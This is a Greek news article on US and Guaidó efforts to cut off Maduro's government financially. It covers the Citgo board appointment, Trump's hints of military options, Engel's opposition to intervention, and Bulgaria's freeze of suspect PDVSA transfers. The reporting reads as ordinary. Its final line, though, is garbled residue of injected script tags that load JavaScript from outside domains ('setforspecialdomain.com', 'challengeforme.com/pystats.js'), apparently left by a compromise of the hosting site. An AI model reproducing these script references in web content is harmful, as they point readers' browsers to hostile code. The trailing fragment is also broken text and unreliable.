Επιχειρούν οικονομικό στραγγαλισμό στον Μαδούρο – Η Βουλγαρία «πάγωσε» ύποπτες μεταβιβάσεις «εκατομμυρίων ευρώ» από τη Βενεζουέλα

Πραξικόπημα» και στην Citgo από τον Γουαϊδό – Νέες απειλές Τραμπ για στρατιωτική επέμβαση

Τον διορισμό νέας διοίκησης στη Citgo ανακοίνωσε ο αυτοανακηρυχθείς πρόεδρος της Βενεζουέλας Χουάν Γουαϊδό, σε μία ακόμη οργανωμένη προσπάθεια της αντιπολίτευσης, σε σύμπνοια με την Ουάσινγκτον για οικονομικό στραγγαλισμό της κυβέρνησης Μαδούρο.

«Η νέα διοίκηση θα αποτελείται από ικανούς Βενεζουελάνους που δεν εμπλέκονται σε σκάνδαλα διαφθοράς και δεν έχουν πολιτικούς δεσμούς», ανακοίνωσε μέσω του Twitter o Γκουαϊδό. Καθώς το πετρέλαιο της Βενεζουέλας είναι βαρύ διυλίζεται εν μέρει στις ΗΠΑ από τη Citgo, θυγατρική της PDVSA.

«Με αυτή την απόφαση, όχι μόνο προστατεύουμε τα περιουσιακά μας στοιχεία, αλλά αποφεύγουμε να συνεχιστεί η καταστροφή της εταιρείας, αποφεύγουμε τις απώλειες», τόνισε.

Η Ουάσινγκτον έχει ήδη δώσει τον έλεγχο των τραπεζικών καταθέσεων της Βενεζουέλας στις ΗΠΑ στον Γουαϊδό, ενώ σκοπεύει να επιβάλει εμπάργκο στις εξαγωγές αργού πετρελαίου από το Καράκας στην αμερικανική αγορά.

Το Καράκας εκτίμησε ότι η ζημιά που προκαλεί στην οικονομία της Βενεζουέλας «το αμερικανικό εμπάργκο» ανέρχεται στα 30 δισεκατομμύρια δολάρια.

Ο Τραμπ, από την πλευρά του, επανέλαβε πως δεν αποκλείει κανένα ενδεχόμενο σε ό,τι αφορά τη Βενεζουέλα, σημειώνοντας ότι «υπάρχουν διάφορες λύσεις, διάφορες επιλογές. Εξετάζουμε όλες τις επιλογές», στο περιθώριο της συνάντησής του με τον Κολομβιανό ομόλογό του Ιβάν Ντούκε.

Σχολιάζοντας το γεγονός ότι το Καράκας εμποδίζει την είσοδο ανθρωπιστικής βοήθειας στη χώρα, έκανε ακόμη λόγο για «φρικτό λάθος» από πλευράς Μαδούρο.

«Προσπαθούμε να περάσουμε τρόφιμα στους ανθρώπους που πεινάνε», τόνισε, χαρακτηρίζοντας «έγκλημα κατά της ανθρωπότητας» την παρεμπόδιση εισόδου της βοήθειας στη Βενεζουέλα.

Όταν ρωτήθηκε αν οι ΗΠΑ θα στείλουν 5.000 στρατιώτες στην Κολομβία, ο Αμερικανός πρόεδρος απάντησε: «Θα δείτε».

Οι ΗΠΑ ανακοίνωσαν μάλιστα χθες ότι θα στείλουν επιπλέον ανθρωπιστική βοήθεια στη Βενεζουέλα.

Από την πλευρά του ο Ντούκε υπογράμμισε ότι είναι απαραίτητο να συνεχίσει να ασκείται πίεση στο Καράκας: «Με τον πρόεδρο Ντόναλντ Τραμπ έχουμε τον ίδιο στόχο: να απελευθερώσουμε τη Βενεζουέλα από τη δικτατορία».

Στο σχόλιό του για τη συνάντηση Τραμπ – Ντούκε ο Νικολάς Μαδούρο μίλησε για «γιορτή μίσους». «Μην ακουμπάτε τη Βενεζουέλα!», προειδοποίησε ο Βενεζουελάνος πρόεδρος επικρίνοντας τους δύο ηγέτες που προτίμησαν να μιλήσουν για τη χώρα του, αντί για «την κοκαΐνη που παράγεται στην Κολομβία».

Αναφορικά με τις απειλές του Ντόναλντ Τραμπ, πάντως, ο πρόεδρος της επιτροπής Εξωτερικών Θεμάτων της Βουλής των Αντιπροσώπων, διαβεβαίωσε ότι το Κογκρέσο δεν θα εγκρίνει στρατιωτική επέμβαση στη Βενεζουέλα.

«Ανησυχώ για την επίδειξη στρατιωτικής ισχύος του προέδρου, του υπαινιγμούς του ότι μια στρατιωτική επέμβαση των ΗΠΑ παραμένει ένα ενδεχόμενο. Θέλω να ξεκαθαρίσω (…): δεν υπάρχει ενδεχόμενο μιας αμερικανικής στρατιωτικής επέμβασης» είπε ο Έλιοτ Ένγκελ, ο οποίος ανήκει στους Δημοκρατικούς.

 

Η Βουλγαρία μπλόκαρε, έπειτα από αίτημα των ΗΠΑ, μεταβιβάσεις πολλών «εκατομμυρίων ευρώ» που έγιναν από την πετρελαϊκή εταιρεία της Βενεζουέλας μέσω της χώρας αυτής κατά παράβαση των αμερικανικών κυρώσεων, όπως ανακοίνωσε η βουλγαρική εισαγγελία.

Η Σόφια κατάργησε λογαριασμό που είχε ανοιχτεί σε βουλγαρική τράπεζα και από τον οποίο περνούσαν χρήματα της εθνικής πετρελαϊκής εταιρείας της Βενεζουέλας, PDVSA, με προορισμό άλλες χώρες, δήλωσε ο γενικός εισαγγελέας, Σοτίρ Τσατσάροφ.

«Πρόκειται για εκατομμύρια ευρώ», διευκρίνισε ο διευθυντής της βουλγαρικής Εθνικής Υπηρεσίας Ασφαλείας, Ντίμιταρ Γκεόργκιεφ, στη διάρκεια συνέντευξης Τύπου στη Σόφια.

Η Βουλγαρία, η οποία ειδοποιήθηκε από την Ουάσινγκτον, «ελέγχει ολόκληρο το τραπεζικό σύστημά της για να διαπιστώσει αν έγιναν δεκτές άλλες μεταβιβάσεις από τη Βενεζουέλα και αν μεταφέρθηκαν ποσά στο εξωτερικό», πρόσθεσε.

«Ο στόχος είναι να βεβαιωθούμε πως δεν έχει κλαπεί ο πλούτος του λαού της Βενεζουέλας» προς όφελος του καθεστώτος, διαβεβαίωσε την Τετάρτη, ο Αμερικανός πρεσβευτής στη Βουλγαρία, Έρικ Ρούμπιν.

Σύμφωνα με τον γενικό εισαγγελέα, τον ύποπτο λογαριασμό, ο οποίος περιλαμβάνει και παράγωγους λογαριασμούς, είχε ανοίξει ένας Βούλγαρος δικηγόρος με διπλή υπηκοότητα. «Οι μεταβιβάσεις απ’ αυτόν τον λογαριασμό δεν έχουν καμιά σχέση με τις δραστηριότητές του ως δικηγόρου», υπογράμμισε.

Ο δικηγόρος, σε βάρος του οποίου είναι πιθανό να ασκηθεί δίωξη για «ξέπλυμα χρήματος», δεν βρίσκεται αυτή τη στιγμή στη Βουλγαρία, διευκρίνισε.

Τα κεφάλαια που πέρασαν από τη Βουλγαρία χρησίμευαν επισήμως για τη χρηματοδότηση αθλητικών δραστηριοτήτων ή την αγορά τροφίμων, κάτι που αμφισβητεί η Ουάσινγκτον.

Ο Κάρλος Παπαρόνι, πρόεδρος της επιτροπής Οικονομικών της Εθνοσυνέλευσης της Βενεζουέλας και προσκείμενος στον πρόεδρο της Εθνοσυνέλευσης και αυτοανακηρυχθέντα προσωρινό πρόεδρο της χώρας, Χουάν Γκουαϊδό, ανακοίνωσε την Κυριακή, μέσω του Twitter, πως η PDVSA είχε επιχειρήσει να υπεξαιρέσει δημόσια κεφάλαια μέσω της Βουλγαρίας.

___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >